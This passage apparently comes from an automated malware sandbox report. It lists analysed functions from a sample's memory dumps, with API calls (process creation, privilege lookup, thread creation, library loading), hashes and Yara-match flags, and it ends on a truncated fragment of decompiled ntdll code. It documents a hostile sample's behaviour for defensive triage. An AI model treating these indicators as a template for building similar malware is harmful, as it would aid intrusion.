                                                                                                    • Instruction ID: 6978cec6e5da7f3ce3642e7a98621fef4b41a586113875b03c075e847617c08a
                                                                                                    • Opcode Fuzzy Hash: d46f4bc899b46e706c4125ff23ec7a408a69498b7c556659a78a4d0331fbc18c
                                                                                                    • Instruction Fuzzy Hash: 3290027120104817D111A5594505707000D97D1381F92C412A1414558D97969952B161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 76f6123d37c2a82e5e271ee67112668c61124e9cbf67abaf2a9e423c957365db
                                                                                                    • Instruction ID: 83fe1b7f617fe4910d2f64d54179885a94181cdea83708e0bf1e78bd22e3d671
                                                                                                    • Opcode Fuzzy Hash: 76f6123d37c2a82e5e271ee67112668c61124e9cbf67abaf2a9e423c957365db
                                                                                                    • Instruction Fuzzy Hash: 6F900261242085565545F5594405507400AA7E1381792C012A2404950C8666A856F661
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: c91ee89f05c0698813fdc1b64901989eafcff28fd69051bd99e2fad4a0b2c429
                                                                                                    • Instruction ID: 8a10da65c10bae8e127bdf96f8ca566bb5c9dc2cbacd05c73a9f44f35509d3e0
                                                                                                    • Opcode Fuzzy Hash: c91ee89f05c0698813fdc1b64901989eafcff28fd69051bd99e2fad4a0b2c429
                                                                                                    • Instruction Fuzzy Hash: 4590027120104806D100A9995409646000997E1341F52D011A6014555EC7A598917171
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: ab4abe84eda0b529207b9bccd446347eaa9c634a8dd7114ee566135f47249056
                                                                                                    • Instruction ID: eaa030ab6a8245d248dbce79e0f3f5bdb56ef3edb13e45e87c153127d917c6cf
                                                                                                    • Opcode Fuzzy Hash: ab4abe84eda0b529207b9bccd446347eaa9c634a8dd7114ee566135f47249056
                                                                                                    • Instruction Fuzzy Hash: 1590027131118806D110A5598405706000997D2341F52C411A1814558D87D598917162
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 81422d0a8c31abbaf99c09b7c11fe90f57b3c98ad146bbb057902e78d5aa65fa
                                                                                                    • Instruction ID: 41b881e4c73c72cb3d4f5f1713fca09efe5bf269cb16439962298b1dc3221db8
                                                                                                    • Opcode Fuzzy Hash: 81422d0a8c31abbaf99c09b7c11fe90f57b3c98ad146bbb057902e78d5aa65fa
                                                                                                    • Instruction Fuzzy Hash: FB90026921304406D180B559540960A000997D2342F92D415A1005558CCA5598697361
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 3282f582aec0734f93574065aa3a36031934ccbc78512de632eec254156546ef
                                                                                                    • Instruction ID: 87d93bd6c43d2f8f9fe852a2932c91deb8c38049856925961e4d0d31e8bd61dc
                                                                                                    • Opcode Fuzzy Hash: 3282f582aec0734f93574065aa3a36031934ccbc78512de632eec254156546ef
                                                                                                    • Instruction Fuzzy Hash: B89002712010CC06D110A559840574A000997D1341F56C411A5414658D87D598917161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a65a5102e1cd498cd51dafc0cfe9ec20abea78a74c8bcd33102410ae7f42a0a7
                                                                                                    • Instruction ID: 6ee7184fd7e9e9a50f8519b944afa9aaf5322df2bdf74583379e2b2423538e8b
                                                                                                    • Opcode Fuzzy Hash: a65a5102e1cd498cd51dafc0cfe9ec20abea78a74c8bcd33102410ae7f42a0a7
                                                                                                    • Instruction Fuzzy Hash: 7090047130104C47D100F55D4405F47000DD7F1341F53C017F1114754DC755DC517571
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 5cba429f98aed39db708c1b8a27ab4211b2662665a382fb103885d87ed32f6cc
                                                                                                    • Instruction ID: 2442ead0f50c3894e49f99868a5d2efba508155998e5084bb2f076f0da87e866
                                                                                                    • Opcode Fuzzy Hash: 5cba429f98aed39db708c1b8a27ab4211b2662665a382fb103885d87ed32f6cc
                                                                                                    • Instruction Fuzzy Hash: 74900265211044070105E9590705507004A97D6391352C021F2005550CD76198617161
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: 7fcbac8b49f7b71986566319e81c089b6a422096a21d8caa97b380b310fe50c9
                                                                                                    • Instruction ID: 4789906afa2f9f93040a34a6a050c34436f9bb57e5bc75bf3f61010e7bb63550
                                                                                                    • Opcode Fuzzy Hash: 7fcbac8b49f7b71986566319e81c089b6a422096a21d8caa97b380b310fe50c9
                                                                                                    • Instruction Fuzzy Hash: 249002A1202044074105B5594415616400E97E1341B52C021E2004590DC66598917165
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F76EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F88
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                    • Opcode ID: f84d3c46913ad7260c98809ac63398f7fc578687ecb57eee0f40a2939cd633b3
                                                                                                    • Instruction ID: 06573fba1eeb29cf6048a7771a399e7b7eb772ae7ace5249ee1ac0c260570dab
                                                                                                    • Opcode Fuzzy Hash: f84d3c46913ad7260c98809ac63398f7fc578687ecb57eee0f40a2939cd633b3
                                                                                                    • Instruction Fuzzy Hash: F1319EB2602705ABD725DF68DCA0FA7B7F8EB88740F00841EF61A9B241D770A545CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F76ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02F76F88
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Sleep
                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                    • Opcode ID: 5cdb78721e3ff6063d09959b678a3619e97b5b87a3e0fe4274be73d272bfa80b
                                                                                                    • Instruction ID: 2477b9c626359044debb0e8d66e64ad8bd237cabb7442e735d92001df65c0fac
                                                                                                    • Opcode Fuzzy Hash: 5cdb78721e3ff6063d09959b678a3619e97b5b87a3e0fe4274be73d272bfa80b
                                                                                                    • Instruction Fuzzy Hash: FD31D2B1A01705BBD710EF58CCA1FABB7B8EB88740F00802EF6199B241E770A455CFA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F784D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID: .z`
                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                    • Instruction ID: dc8d465a43895fe3c7eccc49cbb0b360df37aea7e1b18c51001396621b5e9c75
                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                    • Instruction Fuzzy Hash: A3E046B1200208AFDB18EF99CC48EA777ADEF88790F018559FE095B241CA30F910CAF0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F784CF, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02F63B93), ref: 02F784FD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeHeap
                                                                                                    • String ID: .z`
                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                    • Opcode ID: 4c22fc81f590e95b978d7db007d846185389a090bb2d88b9467ae23b0112168f
                                                                                                    • Instruction ID: 9880e3a808eee1099b87f5ad8955127e72d6bce55f4b3515efb55fc15b493226
                                                                                                    • Opcode Fuzzy Hash: 4c22fc81f590e95b978d7db007d846185389a090bb2d88b9467ae23b0112168f
                                                                                                    • Instruction Fuzzy Hash: 0FE01AB1600204AFDB18DF65CC48EEB77A9EF88390F118559F90997251C631E911CBA0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F67260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02F672BA
                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02F672DB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 1836367815-0
                                                                                                    • Opcode ID: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                                    • Instruction ID: 6a18dc8c64acc96f636399bd817172e66bfa8e827e30c4a220fca44f11cbf65c
                                                                                                    • Opcode Fuzzy Hash: 0d251a6efcd9bab6f901e207b7ee06c09f46ef66761929ea5bbfdc0c346a625e
                                                                                                    • Instruction Fuzzy Hash: AC01A231A8022876E720A6948C02FFEB76CDB40B90F150119FF04BA1C0E6E46A068BF6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F69B13, Relevance: 1.6, APIs: 1, Instructions: 51libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F69B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: f6c4614143237f7e116fd72d2d18412036214e4573f660f8309867521c324285
                                                                                                    • Instruction ID: bb9d95d6a9ff28aa8c848011fdc4732c01a8badb9e089b0d88f386dc48fd3afd
                                                                                                    • Opcode Fuzzy Hash: f6c4614143237f7e116fd72d2d18412036214e4573f660f8309867521c324285
                                                                                                    • Instruction Fuzzy Hash: 8701B1B5E4020EABDF10DEA4DC45FEDB779DB44348F0081A6EA089B241F6B1E708CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F69B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02F69B92
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Load
                                                                                                    • String ID:
                                                                                                    • API String ID: 2234796835-0
                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                    • Instruction ID: 1121125400868cc9e295239b132d81dcced80403c02478453d851a9f1d3c144d
                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                    • Instruction Fuzzy Hash: 53011EB5D0020EABDF10DAA4DC45FADB7B9DB44348F004195EA0897241F671E714CB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F78540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F78594
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateInternalProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2186235152-0
                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                    • Instruction ID: 11fa2ec986684cc65f29ceea732ff0b258c31c03fdc0d01cb5d88ac4019d566c
                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                    • Instruction Fuzzy Hash: 88015FB2214108AFCB54DF89DC84EEB77ADAF8C754F158258FA0D97251D630E851CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F78542, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02F78594
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateInternalProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 2186235152-0
                                                                                                    • Opcode ID: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                                                                    • Instruction ID: d5802c2da046936e2604b12fbcc03133091eac3a6866fea891f80c2da7100147
                                                                                                    • Opcode Fuzzy Hash: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                                                                    • Instruction Fuzzy Hash: 1F015FB2210108AFCB54DF99DC84EEB77A9AF8C754F158258FA0DD7250D630E851CBA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F77010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCD0,?,?), ref: 02F7704C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2422867632-0
                                                                                                    • Opcode ID: 18af4abffdf86a2eaf63914344f617cc699ad87ce475af8ca067f21a85bd95c6
                                                                                                    • Instruction ID: ee8387a5f9070f517c23b0408ce288259f7e3f2f9108ef458753bd1eb430f745
                                                                                                    • Opcode Fuzzy Hash: 18af4abffdf86a2eaf63914344f617cc699ad87ce475af8ca067f21a85bd95c6
                                                                                                    • Instruction Fuzzy Hash: 31E092333903043AE33075A99C02FA7B39CCB81F60F54002AFB0DEB2C0D695F80246A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F77005, Relevance: 1.5, APIs: 1, Instructions: 35threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,02F6CCD0,?,?), ref: 02F7704C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 2422867632-0
                                                                                                    • Opcode ID: 0fb5ef16bbedf3c8ec8363f615a6c3a20ed09fbdf4473036a55bc398d40b7233
                                                                                                    • Instruction ID: c441e0358c28447786a936e687207120ad549ff563801e866159a2c3806ce1a1
                                                                                                    • Opcode Fuzzy Hash: 0fb5ef16bbedf3c8ec8363f615a6c3a20ed09fbdf4473036a55bc398d40b7233
                                                                                                    • Instruction Fuzzy Hash: 37F02B337503003BD33026688C03FE7BB599F81F50F55005AFB4AAB2C1D6A4F80287A6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F78622, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CFA2,02F6CFA2,?,00000000,?,?), ref: 02F78660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899507212-0
                                                                                                    • Opcode ID: b28430becd79fee868cd3057e04527374f5daaddb88b44fd97ff5b5201c4b645
                                                                                                    • Instruction ID: 022d6b24e56079651848a57bee64cd47b5e7d2f02d04e141fd8e649379a1e935
                                                                                                    • Opcode Fuzzy Hash: b28430becd79fee868cd3057e04527374f5daaddb88b44fd97ff5b5201c4b645
                                                                                                    • Instruction Fuzzy Hash: 03F0A0B12003486BDB20DF68CC44EDB7BA8AF85290F018658FD495B252CA30A811CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F78630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,02F6CFA2,02F6CFA2,?,00000000,?,?), ref: 02F78660
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                    • String ID:
                                                                                                    • API String ID: 3899507212-0
                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                    • Instruction ID: 3fd6b6c2ea36f60ac6c84de2d743bdd004ce2f8e576bffb3a070b54379927fef
                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                    • Instruction Fuzzy Hash: 1DE01AB12002086BDB10DF49CC84EE737ADAF88650F018555FA0957241C930E8118BF5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F6D410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67C63,?), ref: 02F6D43B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                    • Instruction ID: 4a1dc9e941428a62ccc979ad5652680d4b88333ee99af8b0d61fe78fc61e1330
                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                    • Instruction Fuzzy Hash: 34D0A7717503043BE610FBA89C07F2632CD9B54B44F494064FA49D73C3DA60F4004561
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02F6D441, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,02F67C63,?), ref: 02F6D43B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, Offset: 02F60000, based on PE: false
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2340568224-0
                                                                                                    • Opcode ID: c1390a099989b5ffb271429971f7cd3cae813a7e720ad0f336a453063b0e534b
                                                                                                    • Instruction ID: 5fbd068f7f0b99d0c4b4407ca4b4424b598b8038e272ea752c98190122240734
                                                                                                    • Opcode Fuzzy Hash: c1390a099989b5ffb271429971f7cd3cae813a7e720ad0f336a453063b0e534b
                                                                                                    • Instruction Fuzzy Hash: 58D01261A0820129EF5695B43B063EA62978F616D4F05409DDF09905C1EA529512A962
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 036E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.597959759.0000000003680000.00000040.00000001.sdmp, Offset: 03680000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.598212454.000000000379B000.00000040.00000001.sdmp Download File
                                                                                                    • Associated: 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: InitializeThunk
                                                                                                    • String ID:
                                                                                                    • API String ID: 2994545307-0
                                                                                                    • Opcode ID: a9181a7f942a0c53d30b27b105366e04887c3102c01a556f69520195a29adf44
                                                                                                    • Instruction ID: 268b7ff4495c903e659c7cd72b013174dc277847d1a05bcbfa045df9d613a9d3
                                                                                                    • Opcode Fuzzy Hash: a9181a7f942a0c53d30b27b105366e04887c3102c01a556f69520195a29adf44
                                                                                                    • Instruction Fuzzy Hash: DBB09B719024C5C9E615D76047087177A447BD1741F17C052D2020651E477CD0D5F5B5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 0373FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E0373FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E036ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03735720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
